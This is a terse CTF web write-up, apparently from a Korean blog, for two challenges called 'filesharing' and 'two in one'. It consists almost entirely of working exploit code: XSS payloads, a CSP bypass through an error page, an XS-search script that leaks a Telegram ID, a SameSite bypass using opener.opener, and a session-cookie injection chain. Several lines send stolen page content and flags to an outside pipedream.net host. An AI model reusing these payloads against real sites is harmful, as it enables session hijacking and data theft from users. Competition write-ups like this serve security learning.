I'm sorry for writing only the exploit and scenario because I don't have enough time.
filesharing
#scenario
1. upload javascript file
2. share admin
3. xss in /play
4. bypass csp via error page
5 inject script into error pageexploit.js
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);"payload
https://filesharing.m0lec.one/play?xss=<script src="/upload/b56fe7aa9bac42d5b24d066807bb41a7"></script>two in one
#scenario
1. leak admin's telegram id via xs search attack (iframe)
2. send payload to telegram bot
3. bypass samesite=strict and get flag using opener.opener trickxsleak.html
<!DOCTYPE html>
<html>
<head>
<title>exploit</title>
</head>
<body></body>
<script>
var chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_';
var charLen = chars.length;
var ENDPOINT = "https://telegrambotclient.m0lec.one/locations?search="
x = window.open('https://telegrambotclient.m0lec.one/locations?search=');
function sleep(t){
return new Promise(resolve=>setTimeout(resolve,t));
}
async function search(leak,charCounter) {
var curChar = chars[charCounter];
console.log(curChar);
x.location = 'https://telegrambotclient.m0lec.one/locations?search=' + leak + curChar;
await sleep(100);
if(x.window.frames.length != 0){
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://enllwt2ugqrt.x.pipedream.net/?cmd='+leak + curChar, true);
xhr.withCredentials = true;
xhr.send(null);
console.log("leak = " + leak + curChar);
leak += curChar
}
search(leak , (charCounter +1 ) % chars.length);
}
function exploit(){
search("y8ww",0);
}
fetch('https://enllwt2ugqrt.x.pipedream.net/?start');
exploit();
</script>
</html>rdr.html
<img src=https://httpstat.us/200?sleep=9000>
<img src=x onerror="
let s=window.open('https://telegrambotclient.m0lec.one/messages','s')
fetch('https://enllwt2ugqrt.x.pipedream.net/?start=start')
">/static/js/popper.min.js
if(document.location.href=="https://telegrambotclient.m0lec.one/messages"){
a = window.open('https://telegrambotclient.m0lec.one/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="setTimeout(function(){window.open('https://note.m0lec.one/logout');},700);setTimeout(function(){ document.cookie='session=.eJwljjFuQzEMQ-_iuYMs27KUy3xIloQEBVrg_2Qqeve46MCBBPjIn3LkGde93J7nKz7K8fByK0zObJALYCSSpiqaYyMeIn1CLBECYBLLSVFFKyUs4WUdgXpdtZlxM00CaqBbgNbrBpiGcwVI4U3NGVmTjBACp7o7kmHZR15XnP9v-rbrOvN4fn_G1w6Gx1-38d7ZxI5zgOpAwDFF6kSHEMgsv2-Y5j5D.YaomgA.58rKF-PLOJEKpL0BnaaZrpFx3to; domain=m0lec.one'},1700);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},1900);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2100);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2300);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},2500);setTimeout(function(){a= window.open('https://note.m0lec.one/note?id=2');},3000)">`;
}, 300);
setTimeout(function(){document.location = 'https://note.m0lec.one/note?id=1';},500);/static/js/jquery-3.3.1.slim.min.js
fetch('https://enllwt2ugqrt.x.pipedream.net/?aa='+opener.opener.document.location.href+'&x='+btoa(opener.opener.document.body.innerHTML))payload
https://a.com/>a</a><base/href="https://ssrf.kr">report
https://ssrf.kr/rdr.html'ctf writeup' 카테고리의 다른 글
| Codegate 2022 Preliminary writeup (0) | 2022.02.27 |
|---|---|
| Real World CTF 4th - web writeup (0) | 2022.01.30 |
| HK CERT CTF 2021 writeup - WEB (0) | 2021.11.14 |
| CyberGuardians CTF all writeup (0) | 2021.11.10 |
| Hack.lu CTF 2021 - web writeup (1) | 2021.10.31 |